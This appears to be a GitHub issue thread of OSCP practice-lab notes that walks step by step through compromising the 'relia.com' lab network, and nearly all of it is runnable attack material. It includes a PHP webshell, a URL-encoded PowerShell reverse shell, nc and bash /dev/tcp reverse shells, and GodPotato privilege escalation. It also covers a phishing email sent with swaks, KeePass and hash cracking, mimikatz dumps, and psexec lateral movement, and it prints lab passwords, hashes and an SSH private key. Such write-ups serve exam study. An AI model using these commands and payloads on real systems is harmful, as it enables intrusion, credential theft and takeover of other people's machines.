feroxbuster -u http://192.168.236.249:8000 -x html -x php -x aspx ---> /cms

...

Found verison info: RiteCMS version v3

searchsploit ritecms --> RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated) - php/webapps/50616.txt

Read 50616.txt ---> Access http://192.168.223.249:8000/cms/admin.php ---> Login via admin/admin () Click 'Admin' menu --> File manager --> upload file ---> Upload webshell.pHp file 

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>

Made using https://www.revshells.com/

---> Access http://192.168.223.249:8000/cms/media/webshell.pHp?cmd=whoami
--> work!

Access 

http://192.168.223.249:8000/cms/media/webshell.pHp?cmd=powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27192.168.45.243%27%2C4443%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22

image

--> We got reverse shell in nc listener! ---> find local.txt This machine is a standlone and not in AD domain.

whoami /priv --> SeImpersonatePrivilege is enabled Try use PrintSpoofer64.exe: iwr -uri http://192.168.45.243:9001/OSCP-Tools/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe .\PrintSpoofer64.exe -i -c powershell.exe --> Failed....

Get-ChildItem -Path C:\Users -Include log,ini,.txt,.pdf,.xls,.xlsx,.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue --> no useful info

Get-CimInstance -ClassName win32service | Select Name,State,PathName | Where-Object {$.State -like 'Running'} --> Apache2.4 Running "C:\xampp\apache\bin\httpd.exe" -k runservice
--> icacls C:\xampp\apache\bin\httpd.exe --> C:\xampp\apache\bin\httpd.exe NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) Everyone:(I)(F) --> sc.exe stop Apache2.4 --> Failed: Access is denied....

schtasks /query /fo LIST /v --> no useful info.

iwr -uri http://192.168.45.243:9001/OSCP-Tools/WindowsEnum.ps1 -Outfile WindowsEnum.ps1 ./WindowsEnum.ps1 --> no useful info

iwr -uri http://192.168.45.243:9001/OSCP-Tools/winPEAS.bat -Outfile winPEAS.bat ./winPEAS.bat ---> doesn:t work

whoami /priv --> SeImpersonatePrivilege is enabled Try to use Gopotato

iwr -uri http://192.168.45.243:9001/OSCP-Tools/GodPotato-NET4.exe -Outfile GodPotato-NET4.exe iwr -uri http://192.168.45.243:9001/OSCP-Tools/nc64.exe -Outfile nc64.exe ./GodPotato-NET4.exe -cmd "C:\Users\adrian\nc64.exe -e c:\windows\system32\cmd.exe 192.168.45.243 4445" ---> Got reverse shell on our NC listener.

But didn:t show output for some command such as whoami Try to add adrian to admin group: 

net localgroup administrators adrian /add  ## Add adrian to admin group
net user adrian password123         #change adrian:s password to password123.
net localgroup "Remote Desktop Users" adrian /add

RDP login xfreerdp /u:'adrian /p:'password123' /v:192.168.223.249 /cert-ignore /cert-ignore /compression /auto-reconnect /bpp:8 ---> succeed login with admin right found 'proof.txt' in damon folder.

found a hidden .git folder in C:/staging folder 

C:\staging>git status
fatal: detected dubious ownership in repository at 'C:/staging'
'C:/staging' is owned by:
        'S-1-5-32-544'
but the current user is:
        'S-1-5-21-464543310-226837244-3834982083-1004'
To add an exception for this directory, call:

        git config --global --add safe.directory C:/staging

C:\staging>git config --global --add safe.directory C:/staging   ★
C:\staging>git status
On branch master
nothing to commit, working tree clean

C:\staging>git log
--->
found log info

C:\staging> git show 8b430c17c16e6c0515e49c4eafdd129f719fde74

---> maildmz@relia.com:DPuBT9tGCBrTbR jim@relia.com: responsible for the mail server

WDavid404 commented 8 months ago

172.16.x.14

Try phishing email to jim refer to https://github.com/WDavid404/OSCP/issues/5#issuecomment-2015071589 sudo swaks -t jim@relia.com --from maildmz@relia.com --attach @config.Library-ms --server 192.168.236.189 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap

└─$ nc -lvp 4444  
listening on [any] 4444 ...
192.168.236.191: inverse host lookup failed: Unknown host
connect to [192.168.45.161] from (UNKNOWN) [192.168.236.191] 62835
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\System32\WindowsPowerShell\v1.0> whoami
whoami
relia\jim
PS C:\Windows\System32\WindowsPowerShell\v1.0> ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 172.16.126.14
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.126.254
PS C:\Windows\System32\WindowsPowerShell\v1.0>

Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue --> Got local.txt and proof.txt

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} PS C:\Users\dave> Get-History ---》Get-CimInstance : Access denied

whoami /priv --> No SeImpersonatePrivilege... But SeShutdownPrivilege.

ping <Kali's IP> --> works. so we can transfer files/tools from Kali to .14 machine.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.161 LPORT=4445 -f exe -o met.exe iwr -uri http://192.168.45.161:9001/met.exe -Outfile Autologon.exe shutdown /r /t 0 ---> doesn't work...

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue ---> C:\Users\jim\Documents\Database.kdbx

send Database.kdbx to kali (using smb share folder) then, --> keepass2john Database.kdbx > keepass.hash cat keepass.hash Database:$keepass$*2*60000*0*682a0e535986c0ab7f02ef294ddfdf8.... Remove 'Database:' from keepass.hash then, hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force --> main password: mercedes1

On .250 to open database.kdbx ---> jim@relia.com/Castello1! dmzadmin/SlimGodhoodMope ;logon local admin.

Other: Try mimikatz -->Failed: ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

WDavid404 commented 8 months ago

192.168.x.191

hydra -L users.txt -P passwords.txt 192.168.236.191 http-get ---> failed.

Use the cred info found in .14 to RDP login to 191: xfreerdp /u:dmzadmin /p:SlimGodhoodMope /v:192.168.236.191 /cert-ignore /w:1200 /h:800 /compression /auto-reconnect /drive:.,kali-share +clipboard ---> succeed. ----> get local.txt

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue --> No info

mimikatz --》 ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

ipconfig --> 192.168.x.191 172.16.129.254 ---> It connect to 172.16.x.x so, We can set up a chisel tunnel on 191

WDavid404 commented 8 months ago

Recon2

Build a http tunnel between Kali and 191,

proxychains -q crackmapexec smb 172.16.129.6 172.16.129.7 172.16.129.15 172.16.129.19 172.16.129.20 172.16.129.21 172.16.129.30 -u users.txt -d relia.com -p passwords.txt --shares ----》

SMB         172.16.129.7    445    INTRANET         Share           Permissions     Remark
SMB         172.16.129.7    445    INTRANET         -----           -----------     ------
SMB         172.16.129.7    445    INTRANET         ADMIN$                          Remote Admin
SMB         172.16.129.7    445    INTRANET         C$                              Default share
SMB         172.16.129.7    445    INTRANET         IPC$            READ            Remote IPC

SMB         172.16.129.15   445    WK02             Share           Permissions     Remark
SMB         172.16.129.15   445    WK02             -----           -----------     ------
SMB         172.16.129.15   445    WK02             ADMIN$                          Remote Admin
SMB         172.16.129.15   445    WK02             C$                              Default share
SMB         172.16.129.15   445    WK02             IPC$            READ            Remote IPC

SMB         172.16.129.6    445    DC02             Share           Permissions     Remark
SMB         172.16.129.6    445    DC02             -----           -----------     ------
SMB         172.16.129.6    445    DC02             ADMIN$                          Remote Admin
SMB         172.16.129.6    445    DC02             C$                              Default share
SMB         172.16.129.6    445    DC02             IPC$            READ            Remote IPC
SMB         172.16.129.6    445    DC02             NETLOGON        READ            Logon server share 
SMB         172.16.129.6    445    DC02             SYSVOL          READ            Logon server share 

SMB         172.16.129.30   445    WEBBY            Share           Permissions     Remark
SMB         172.16.129.30   445    WEBBY            -----           -----------     ------
SMB         172.16.129.30   445    WEBBY            ADMIN$                          Remote Admin
SMB         172.16.129.30   445    WEBBY            C$                              Default share
SMB         172.16.129.30   445    WEBBY            IPC$            READ            Remote IPC

SMB         172.16.129.21   445    FILES            [+] relia.com\jim:Castello1! 
SMB         172.16.129.21   445    FILES            ADMIN$                          Remote Admin
SMB         172.16.129.21   445    FILES            apps            READ            
SMB         172.16.129.21   445    FILES            C$                              Default share
SMB         172.16.129.21   445    FILES            IPC$            READ            Remote IPC
SMB         172.16.129.21   445    FILES            monitoring      READ            
SMB         172.16.129.21   445    FILES            scripts         READ

also check for ssh, winrm protocol ---> No useful info

Try checking the shared SMB folder 

proxychains -q smbclient '//172.16.129.21/monitoring' -N -c 'prompt OFF;recurse ON;mget *' --user=relia.com/jim%Castello1! 
proxychains -q smbclient '//172.16.129.21/scripts' -N -c 'prompt OFF;recurse ON;mget *' --user=relia.com/jim%Castello1!

---> We can get some info:

- CVE-2021-36934
- RELIA\john.m / YouWillNeverTakeMyTractor!1922
- RELIA\Administrator / vau!XCKjNQBv2$

proxychains -q crackmapexec smb 172.16.129.6 172.16.129.7 172.16.129.15 172.16.129.19 172.16.129.20 172.16.129.21 172.16.129.30 -u john.m -d relia.com -p YouWillNeverTakeMyTractor\!1922 ---> No info

proxychains -q crackmapexec smb 172.16.129.6 172.16.129.7 172.16.129.15 172.16.129.19 172.16.129.20 172.16.129.21 172.16.129.30 -u Administrator -d relia.com -p vau\!XCKjNQBv2\$ --->

SMB         172.16.129.15   445    WK02             [+] relia.com\Administrator:vau!XCKjNQBv2$ (Pwn3d!)
SMB         172.16.129.6    445    DC02             [+] relia.com\Administrator:vau!XCKjNQBv2$ (Pwn3d!)
SMB         172.16.129.7    445    INTRANET         [+] relia.com\Administrator:vau!XCKjNQBv2$ (Pwn3d!)
SMB         172.16.129.21   445    FILES            [+] relia.com\Administrator:vau!XCKjNQBv2$ (Pwn3d!)
SMB         172.16.129.30   445    WEBBY            [+] relia.com\Administrator:vau!XCKjNQBv2$ (Pwn3d!)
WDavid404 commented 8 months ago

172.16.129.15

sudo proxychains -q xfreerdp /d:'relia.com' /u:Administrator /p:vau\!XCKjNQBv2\$ /v:172.16.129.15 /cert-ignore /w:1200 /h:800 /compression /auto-reconnect /drive:.,kali-share +clipboard ---> Succeed. ---> find local.txt and proof.txt

And we also found a database.kdbx file: keepass2john Database.kdbx > keepass.hash Remove 'Database:' from keepass.hash then, hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force ---> password: destiny1 --> Got info from kdbx file:

BACKUP Machine SSH Key
username: sarah 

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACBEhRgOw+Adwr6+R/A54Ng75WK1VsH1f+xloYwIbFnoAwAAAJgtoEZgLaBG
YAAAAAtzc2gtZWQyNTUxOQAAACBEhRgOw+Adwr6+R/A54Ng75WK1VsH1f+xloYwIbFnoAw
AAAECk3NMSFKJMauIwp/DPYEhMV4980aMdDOlfIlTq3qy4SkSFGA7D4B3Cvr5H8Dng2Dvl
YrVWwfV/7GWhjAhsWegDAAAADnRlc3RzQGhhdC13b3JrAQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----

Try mimikatz: mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords --->

mimikatz # token::elevate mimikatz # lsadump::sam ---> No more info

172.16.x.6

sudo proxychains -q xfreerdp /d:'relia.com' /u:Administrator /p:vau\!XCKjNQBv2\$ /v:172.16.136.6 /cert-ignore /w:1200 /h:800 /compression /auto-reconnect /drive:.,kali-share +clipboard ---> succeed.

Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue --> proof.txt but no local.txt

mimikatz.exe --> no new info

172.16.x.7

sudo proxychains -q xfreerdp /d:'relia.com' /u:Administrator /p:vau\!XCKjNQBv2\$ /v:172.16.136.7 /cert-ignore /w:1200 /h:800 /compression /auto-reconnect /drive:.,kali-share +clipboard --> got proof.txt and local.txt

mimikatz.exe --> andrea / ce3f12443651168b3793f5fbcccff9db / PasswordPassword_6

172.16.x.30

sudo proxychains -q xfreerdp /d:'relia.com' /u:Administrator /p:vau\!XCKjNQBv2\$ /v:172.16.136.30 /cert-ignore /w:1200 /h:800 /compression /auto-reconnect /drive:.,kali-share +clipboard ---> Proof.txt only

mimikatz --> No new info

172.16.x.21

RDP doesn't work since there is no 3389 port. winrm also doesn't work

proxychains impacket-psexec relia/administrator:"vau\!XCKjNQBv2$"@172.16.136.21 --> work! proof.txt only

mimikatz --> no new info.

WDavid404 commented 8 months ago

192.168.x.189

crackmapexec smb 192.168.246.189 -u Administrator -d relia.com -p vau\!XCKjNQBv2\$

SMB         192.168.246.189 445    MAIL             [*] Windows 10.0 Build 20348 x64 (name:MAIL) (domain:relia.com) (signing:False) (SMBv1:False)
SMB         192.168.246.189 445    MAIL             [+] relia.com\Administrator:vau!XCKjNQBv2$ (Pwn3d!)

impacket-psexec relia/administrator:"vau\!XCKjNQBv2$"@192.168.246.189 --->login succeed! found proof.txt only

mimikatz --> no useful info

net user /domain

Administrator            andrea                   anna                     
brad                     dan                      Guest                    
iis_service              internaladmin            jenny                    
jim                      krbtgt                   larry                    
maildmz                  michelle                 milana                   
mountuser

Add to the user list.

172.16.x.19

Because we found sarah key info on 172.16.129.15, we use it to ssh login 19 host: proxychains -q ssh -i sarah.key sarah@172.16.97.19 --> succeed. Get local.txt

$ sudo -l --->

Matching Defaults entries for sarah on backup:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sarah may run the following commands on backup:
    (ALL) NOPASSWD: /usr/bin/borg list *
    (ALL) NOPASSWD: /usr/bin/borg extract *
    (ALL) NOPASSWD: /usr/bin/borg mount *

timeout 5m ./pspy64 ---> 

2024/04/07 03:56:18 CMD: UID=0     PID=7628   | /usr/bin/python3 /usr/bin/borg create /opt/borgbackup::usb_1712462178 /media/usb0 
2024/04/07 03:56:18 CMD: UID=0     PID=7627   | /bin/sh -c BORG_PASSPHRASE='xinyVzoH2AnJpRK9sfMgBA' borg create /opt/borgbackup::usb_1712462178 /media/usb0 
2024/04/07 03:56:18 CMD: UID=0     PID=7629   | /usr/bin/python3 /usr/bin/borg create /opt/borgbackup::usb_1712462178 /media/usb0 
2024/04/07 03:56:18 CMD: UID=0     PID=7630   | /usr/bin/python3 /usr/bin/borg create /opt/borgbackup::usb_1712462178 /media/usb0 
2024/04/07 03:56:19 CMD: UID=0     PID=7631   | sleep 15 
2024/04/07 03:56:34 CMD: UID=0     PID=7640   | /usr/bin/python3 /usr/bin/borg create /opt/borgbackup::usb_1712462194 /media/usb0 
2024/04/07 03:56:34 CMD: UID=0     PID=7639   | /bin/sh -c BORG_PASSPHRASE='xinyVzoH2AnJpRK9sfMgBA' borg create /opt/borgbackup::usb_1712462194 /media/usb0    ★★
2024/04/07 03:56:34 CMD: UID=0     PID=7641   | /usr/bin/python3 /usr/bin/borg create /opt/borgbackup::usb_1712462194 /media/usb0

--> points:

Then, sudo /usr/bin/borg list /opt/borgbackup and enter passphase --->

home                                 Mon, 2022-10-17 22:29:47 [680a2deb3b958081ac2b5a28e9c0fa1735c0bd8eb7323cf0ffbb3579b4fd5d4d]
usb_1712467323                       Sun, 2024-04-07 05:22:03 [5fe9d1e6dd241249c1fe0c32c5d63694d592ed78f53ce6f934f9d3275fcc74a3]
usb_1712467338                       Sun, 2024-04-07 05:22:18 [a10f908e81c623fa8d6ecff63a93dc25f30826bf2b6c126419f0c67e31a1550f]
usb_1712467353                       Sun, 2024-04-07 05:22:34 [46e22f64839a7b844eaf671238759447a5913c8520e7b3d867ae41afa9f9f337]
....

sudo /usr/bin/borg extract --stdout /opt/borgbackup::home and enter passphase ---> amy / 0814b6b7f0de51ecf54ca5b6e6e612bf       andrew / Rb9kNokjDsjYyH / @172.16.6.20

sudo /usr/bin/borg extract --stdout /opt/borgbackup::usb_1712467837 --> Archive usb_1712467323 does not exist OR no info

su amy --> try use "0814b6b7f0de51ecf54ca5b6e6e612bf" as password but FAILED maybe "0814b6b7f0de51ecf54ca5b6e6e612bf" is a hash crack it using the website: https://crackstation.net/ --> amy / backups1

switch to amy (su amy) found amy has root priv. --> we can get proof.txt: sudo cat /root/proof.txt

172.16.x.20

proxychains -q nmap -sT -T4 172.16.136.20 --> 22 port

proxychains -q andrew@172.16.89.20 (pass: Rb9kNokjDsjYyH ) --> Get local.txt

find / -perm -u=s -type f 2>/dev/null -->

/usr/local/bin/doasedit
/usr/local/bin/vidoas
/usr/local/bin/doas
/usr/bin/chpass
/usr/bin/atq
...

find / -name doas.conf -type file 2>/dev/null --> /usr/local/etc/doas.conf ---> permit nopass andrew as root cmd service args apache24 onestart

And, accoding to Linpeas, '/usr/local/www/apache24/data/phpMyAdmin/tmp' is a writable dir for us.

'/usr/local/etc/apache24/httpd.conf' is conf for apache24 --> DocumentRoot "/usr/local/www/apache24/data"

so, put a reverse.php file under /usr/local/www/apache24/data/phpMyAdmin/tmp <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.180/4445 0>&1'");?>

/usr/local/bin/doas service apache24 onestart --> image[]

[Kali] proxychains -q curl 172.16.105.20/phpMyAdmin/tmp/php_reverse_me.php ---> we can get reverse shell from 20 with "wwww" user. --> get proof.txt

WDavid404 commented 7 months ago

Lesson